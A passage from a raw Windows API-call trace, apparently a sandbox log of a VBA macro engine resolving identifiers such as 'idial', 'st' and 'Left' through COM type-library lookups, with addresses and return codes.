lpWideCharStr=0x182c40, cchWideChar=6 | out: lpWideCharStr="idial") returned 6 [0042.058] IUnknown:AddRef (This=0x6990960) returned 0x8 [0042.058] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="idial", lHashVal=0x102125, pfName=0x182d10, pBstrLibName=0x182c40 | out: pfName=0x182d10*=0, pBstrLibName=0x182c40) returned 0x0 [0042.058] IUnknown:Release (This=0x6990960) returned 0x7 [0042.058] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.058] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="idial", lHashVal=0x102125, pfName=0x182d10, pBstrLibName=0x182c40 | out: pfName=0x182d10*=0, pBstrLibName=0x182c40) returned 0x0 [0042.058] IUnknown:Release (This=0x6992850) returned 0x11 [0042.058] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.058] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="idial", lHashVal=0x102125, pfName=0x182d10, pBstrLibName=0x182c40 | out: pfName=0x182d10*=0, pBstrLibName=0x182c40) returned 0x0 [0042.058] IUnknown:Release (This=0x6992df0) returned 0xc [0042.058] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.058] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="idial", lHashVal=0x102125, pfName=0x182d10, pBstrLibName=0x182c40 | out: pfName=0x182d10*=0, pBstrLibName=0x182c40) returned 0x0 [0042.058] IUnknown:Release (This=0x6992580) returned 0x6 [0042.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2fea, cbMultiByte=6, lpWideCharStr=0x182e90, cchWideChar=7 | out: lpWideCharStr="idial") returned 6 [0042.058] ITypeComp:RemoteBind (in: This=0x6992590, szName="idial", lHashVal=0x102125, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2fea, cbMultiByte=6, lpWideCharStr=0x182e90, cchWideChar=7 | out: lpWideCharStr="idial") returned 6 [0042.058] ITypeComp:RemoteBind (in: This=0x6993ee0, szName="idial", lHashVal=0x102125, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.059] IMalloc:Alloc (This=0x7feffc15380, cb=0xd) returned 0x6c348d0 [0042.059] _mbscpy_s (in: _Dst=0x6c348d0, _DstSizeInBytes=0x6, _Src=0x38a2fea | out: _Dst=0x6c348d0) returned 0x0 [0042.059] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_idial") returned 0x10e551 [0042.059] strcpy_s (in: _Dst=0x182fa0, _DstSize=0xd, _Src="_B_var_idial" | out: _Dst="_B_var_idial") returned 0x0 [0042.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182fa0, cbMultiByte=13, lpWideCharStr=0x182df0, cchWideChar=13 | out: lpWideCharStr="_B_var_idial") returned 13 [0042.059] IUnknown:AddRef (This=0x6990960) returned 0x8 [0042.059] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="_B_var_idial", lHashVal=0x10e551, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.059] IUnknown:Release (This=0x6990960) returned 0x7 [0042.059] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.059] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="_B_var_idial", lHashVal=0x10e551, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.059] IUnknown:Release (This=0x6992850) returned 0x11 [0042.059] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.059] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="_B_var_idial", lHashVal=0x10e551, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.059] IUnknown:Release (This=0x6992df0) returned 0xc [0042.059] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.059] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="_B_var_idial", lHashVal=0x10e551, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.059] IUnknown:Release (This=0x6992580) returned 0x6 [0042.059] IUnknown:AddRef (This=0x6993ed0) returned 0x7 [0042.059] ITypeLib:RemoteIsName (in: This=0x6993ed0, szNameBuf="_B_var_idial", lHashVal=0x10e551, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.059] IUnknown:Release (This=0x6993ed0) returned 0x6 [0042.059] IUnknown:AddRef (This=0x6990960) returned 0x8 [0042.059] IUnknown:Release (This=0x6990960) returned 0x7 [0042.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505072e, cbMultiByte=13, lpWideCharStr=0x182e50, cchWideChar=14 | out: lpWideCharStr="_B_var_idial") returned 13 [0042.059] ITypeComp:RemoteBind (in: This=0x6990970, szName="_B_var_idial", lHashVal=0x10e551, wFlags=0x5, ppTInfo=0x182e08, pDescKind=0x182e1c, ppFuncDesc=0x182e20, ppVarDesc=0x69005f00720061, ppTypeComp=0x6c006100000000, pDummy=0x0 | out: ppTInfo=0x182e08*=0x0, pDescKind=0x182e1c*=0, ppFuncDesc=0x182e20, ppVarDesc=0x69005f00720061, ppTypeComp=0x6c006100000000, pDummy=0x0) returned 0x0 [0042.059] _mbscpy_s (in: _Dst=0x183010, _DstSizeInBytes=0x6, _Src=0x38a2fea | out: _Dst=0x183010) returned 0x0 [0042.059] ITypeComp:RemoteBind (in: This=0x6990970, szName="st", lHashVal=0x105f28, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050052, cbMultiByte=3, lpWideCharStr=0x182e90, cchWideChar=4 | out: lpWideCharStr="st") returned 3 [0042.059] ITypeComp:RemoteBind (in: This=0x6992860, szName="st", lHashVal=0x105f28, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050052, cbMultiByte=3, lpWideCharStr=0x182e90, cchWideChar=4 | out: lpWideCharStr="st") returned 3 [0042.059] ITypeComp:RemoteBind (in: This=0x6992e00, szName="st", lHashVal=0x105f28, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.060] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="st") returned 0x105f28 [0042.060] strcpy_s (in: _Dst=0x182df0, _DstSize=0x3, _Src="st" | out: _Dst="st") returned 0x0 [0042.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182df0, cbMultiByte=3, lpWideCharStr=0x182c40, cchWideChar=3 | out: lpWideCharStr="st") returned 3 [0042.060] IUnknown:AddRef (This=0x6990960) returned 0x8 [0042.060] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="st", lHashVal=0x105f28, pfName=0x182d10, pBstrLibName=0x182c40 | out: pfName=0x182d10*=0, pBstrLibName=0x182c40) returned 0x0 [0042.060] IUnknown:Release (This=0x6990960) returned 0x7 [0042.060] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.060] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="st", lHashVal=0x105f28, pfName=0x182d10, pBstrLibName=0x182c40 | out: pfName=0x182d10*=0, pBstrLibName=0x182c40) returned 0x0 [0042.060] IUnknown:Release (This=0x6992850) returned 0x11 [0042.060] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.060] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="st", lHashVal=0x105f28, pfName=0x182d10, pBstrLibName=0x182c40 | out: pfName=0x182d10*=0, pBstrLibName=0x182c40) returned 0x0 [0042.060] IUnknown:Release (This=0x6992df0) returned 0xc [0042.060] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.060] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="st", lHashVal=0x105f28, pfName=0x182d10, pBstrLibName=0x182c40 | out: pfName=0x182d10*=0, pBstrLibName=0x182c40) returned 0x0 [0042.060] IUnknown:Release (This=0x6992580) returned 0x6 [0042.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050052, cbMultiByte=3, lpWideCharStr=0x182e90, cchWideChar=4 | out: lpWideCharStr="st") returned 3 [0042.060] ITypeComp:RemoteBind (in: This=0x6992590, szName="st", lHashVal=0x105f28, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050052, cbMultiByte=3, lpWideCharStr=0x182e90, cchWideChar=4 | out: lpWideCharStr="st") returned 3 [0042.060] ITypeComp:RemoteBind (in: This=0x6993ee0, szName="st", lHashVal=0x105f28, wFlags=0x5, ppTInfo=0x182e48, pDescKind=0x182e5c, ppFuncDesc=0x182e60, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e48*=0x0, pDescKind=0x182e5c*=0, ppFuncDesc=0x182e60, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.060] IMalloc:Alloc (This=0x7feffc15380, cb=0xa) returned 0x6c348d0 [0042.060] _mbscpy_s (in: _Dst=0x6c348d0, _DstSizeInBytes=0x3, _Src=0x5050052 | out: _Dst=0x6c348d0) returned 0x0 [0042.060] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_st") returned 0x10f3d0 [0042.060] strcpy_s (in: _Dst=0x182fa0, _DstSize=0xa, _Src="_B_var_st" | out: _Dst="_B_var_st") returned 0x0 [0042.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182fa0, cbMultiByte=10, lpWideCharStr=0x182df0, cchWideChar=10 | out: lpWideCharStr="_B_var_st") returned 10 [0042.060] IUnknown:AddRef (This=0x6990960) returned 0x8 [0042.060] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="_B_var_st", lHashVal=0x10f3d0, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.060] IUnknown:Release (This=0x6990960) returned 0x7 [0042.060] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.060] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="_B_var_st", lHashVal=0x10f3d0, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.060] IUnknown:Release (This=0x6992850) returned 0x11 [0042.060] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.060] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="_B_var_st", lHashVal=0x10f3d0, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.060] IUnknown:Release (This=0x6992df0) returned 0xc [0042.060] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.060] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="_B_var_st", lHashVal=0x10f3d0, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.061] IUnknown:Release (This=0x6992580) returned 0x6 [0042.061] IUnknown:AddRef (This=0x6993ed0) returned 0x7 [0042.061] ITypeLib:RemoteIsName (in: This=0x6993ed0, szNameBuf="_B_var_st", lHashVal=0x10f3d0, pfName=0x182ec0, pBstrLibName=0x182df0 | out: pfName=0x182ec0*=0, pBstrLibName=0x182df0) returned 0x0 [0042.061] IUnknown:Release (This=0x6993ed0) returned 0x6 [0042.061] IUnknown:AddRef (This=0x6990960) returned 0x8 [0042.061] IUnknown:Release (This=0x6990960) returned 0x7 [0042.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505075e, cbMultiByte=10, lpWideCharStr=0x182e50, cchWideChar=11 | out: lpWideCharStr="_B_var_st") returned 10 [0042.061] ITypeComp:RemoteBind (in: This=0x6990970, szName="_B_var_st", lHashVal=0x10f3d0, wFlags=0x5, ppTInfo=0x182e08, pDescKind=0x182e1c, ppFuncDesc=0x182e20, ppVarDesc=0x73005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182e08*=0x0, pDescKind=0x182e1c*=0, ppFuncDesc=0x182e20, ppVarDesc=0x73005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.061] _mbscpy_s (in: _Dst=0x183010, _DstSizeInBytes=0x3, _Src=0x5050052 | out: _Dst=0x183010) returned 0x0 [0042.061] IMalloc:Realloc (This=0x7feffc15380, pv=0x66ec4d0, cb=0x1000) returned 0x6859480 [0042.061] IMalloc:Realloc (This=0x7feffc15380, pv=0x6703120, cb=0x1dc) returned 0x6ae77d0 [0042.061] IMalloc:Free (This=0x7feffc15380, pv=0x6a67860) [0042.061] GetCurrentProcess () returned 0xffffffffffffffff [0042.061] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7bf68, dwSize=0x8) returned 1 [0042.061] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7bf68, dwSize=0x8) returned 1 [0042.061] GetCurrentProcess () returned 0xffffffffffffffff [0042.061] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7c038, dwSize=0x8) returned 1 [0042.061] GetCurrentProcess () returned 0xffffffffffffffff [0042.061] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab018, dwSize=0x8) returned 1 [0042.061] GetCurrentProcess () returned 0xffffffffffffffff [0042.061] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab0e0, dwSize=0x8) returned 1 [0042.061] GetCurrentProcess () returned 0xffffffffffffffff [0042.061] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab270, dwSize=0x8) returned 1 [0042.061] GetCurrentProcess () returned 0xffffffffffffffff [0042.061] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab330, dwSize=0x8) returned 1 [0042.061] GetCurrentProcess () returned 0xffffffffffffffff [0042.061] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab368, dwSize=0x8) returned 1 [0042.061] GetCurrentProcess () returned 0xffffffffffffffff [0042.061] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab4a8, dwSize=0x8) returned 1 [0042.061] GetCurrentProcess () returned 0xffffffffffffffff [0042.061] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab578, dwSize=0x8) returned 1 [0042.061] IUnknown:AddRef (This=0x6a6e8e8) returned 0xa [0042.061] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184428 | out: ppvObject=0x184428*=0x0) returned 0x80004002 [0042.061] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184420 | out: ppvObject=0x184420*=0x0) returned 0x80004002 [0042.061] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.061] IUnknown:AddRef (This=0x6ceee08) returned 0x5 [0042.062] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184428 | out: ppvObject=0x184428*=0x0) returned 0x80004002 [0042.062] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184420 | out: ppvObject=0x184420*=0x0) returned 0x80004002 [0042.062] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.062] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.062] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184428 | out: ppvObject=0x184428*=0x0) returned 0x80004002 [0042.062] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x184420 | out: ppvObject=0x184420*=0x0) returned 0x80004002 [0042.062] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.062] VarCmp (pvarLeft=0x6b7ec98, pvarRight=0x6b7ec30, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.062] ITypeComp:RemoteBind (in: This=0x6990970, szName="Left", lHashVal=0x107be5, wFlags=0x3, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a10ee, cbMultiByte=5, lpWideCharStr=0x182d30, cchWideChar=6 | out: lpWideCharStr="Left") returned 5 [0042.063] ITypeComp:RemoteBind (in: This=0x6992860, szName="Left", lHashVal=0x107be5, wFlags=0x3, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a10ee, cbMultiByte=5, lpWideCharStr=0x182d30, cchWideChar=6 | out: lpWideCharStr="Left") returned 5 [0042.064] ITypeComp:RemoteBind (in: This=0x6992e00, szName="Left", lHashVal=0x107be5, wFlags=0x3, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.064] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0042.064] ITypeComp:RemoteBind (in: This=0x6992590, szName="Left", lHashVal=0x107be5, wFlags=0x3, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a10ee, cbMultiByte=5, lpWideCharStr=0x182d30, cchWideChar=6 | out: lpWideCharStr="Left") returned 5 [0042.064] ITypeComp:RemoteBind (in: This=0x6993ee0, szName="Left", lHashVal=0x107be5, wFlags=0x3, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.064] IMalloc:Alloc (This=0x7feffc15380, cb=0xc) returned 0x6c348d0 [0042.064] _mbscpy_s (in: _Dst=0x6c348d0, _DstSizeInBytes=0x5, _Src=0x38a10ee | out: _Dst=0x6c348d0) returned 0x0 [0042.064] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Left") returned 0x10e151 [0042.064] strcpy_s (in: _Dst=0x182e40, _DstSize=0xc, _Src="_B_var_Left" | out: _Dst="_B_var_Left") returned 0x0 [0042.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182e40, cbMultiByte=12, lpWideCharStr=0x182c90, cchWideChar=12 | out: lpWideCharStr="_B_var_Left") returned 12 [0042.064] IUnknown:AddRef (This=0x6990960) returned 0x8 [0042.064] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="_B_var_Left", lHashVal=0x10e151, pfName=0x182d60, pBstrLibName=0x182c90 | out: pfName=0x182d60*=1, pBstrLibName=0x182c90) returned 0x0 [0042.064] IUnknown:Release (This=0x6990960) returned 0x7 [0042.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_B_var_Left", cchWideChar=-1, lpMultiByteStr=0x182e40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_B_var_Left", lpUsedDefaultChar=0x0) returned 12 [0042.064] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Left") returned 0x10e151 [0042.064] IUnknown:AddRef (This=0x6990960) returned 0x8 [0042.064] IUnknown:Release (This=0x6990960) returned 0x7 [0042.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505078a, cbMultiByte=12, lpWideCharStr=0x182cf0, cchWideChar=13 | out: lpWideCharStr="_B_var_Left") returned 12 [0042.064] ITypeComp:RemoteBind (in: This=0x6990970, szName="_B_var_Left", lHashVal=0x10e151, wFlags=0x3, ppTInfo=0x182ca8, pDescKind=0x182cbc, ppFuncDesc=0x182cc0, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ca8*=0x6bb49d0, pDescKind=0x182cbc*=1, ppFuncDesc=0x182cc0, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.064] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bb49d0, ppTypeAttr=0x182cb0, pDummy=0x1 | out: ppTypeAttr=0x182cb0, pDummy=0x1) returned 0x0 [0042.064] ITypeInfo:LocalReleaseTypeAttr (This=0x6bb49d0) returned 0x0 [0042.064] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x182b10 | out: ppvObject=0x182b10*=0x6bb49d0) returned 0x0 [0042.064] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x6bb49d0, memid=1610612748, invkind=1, pFuncIndex=0x182b50 | out: pFuncIndex=0x182b50*=0xc) returned 0x0 [0042.065] ITypeInfo2:GetFuncCustData (in: This=0x6bb49d0, index=0xc, GUID=0x7fee45e3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x182b68 | out: pVarVal=0x182b68*(varType=0x0, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x10e151)) returned 0x0 [0042.065] IUnknown:Release (This=0x6bb49d0) returned 0x1 [0042.065] IUnknown:AddRef (This=0x6bb49d0) returned 0x2 [0042.065] ITypeInfo:LocalReleaseFuncDesc (This=0x6bb49d0) returned 0x0 [0042.065] IUnknown:Release (This=0x6bb49d0) returned 0x1 [0042.065] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182d68 | out: ppvObject=0x182d68*=0x0) returned 0x80004002 [0042.065] IUnknown:AddRef (This=0x6bb49d0) returned 0x2 [0042.065] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182da0 | out: ppvObject=0x182da0*=0x0) returned 0x80004002 [0042.065] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182d70 | out: ppvObject=0x182d70*=0x0) returned 0x80004002 [0042.065] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182d60 | out: ppvObject=0x182d60*=0x0) returned 0x80004002 [0042.065] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182d68 | out: ppvObject=0x182d68*=0x0) returned 0x80004002 [0042.065] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bb49d0, ppTypeAttr=0x182d98, pDummy=0x10 | out: ppTypeAttr=0x182d98, pDummy=0x10) returned 0x0 [0042.065] ITypeInfo:LocalReleaseTypeAttr (This=0x6bb49d0) returned 0x0 [0042.065] IUnknown:AddRef (This=0x6bb49d0) returned 0x3 [0042.065] IUnknown:Release (This=0x6bb49d0) returned 0x2 [0042.065] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182f88 | out: ppvObject=0x182f88*=0x0) returned 0x80004002 [0042.065] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, 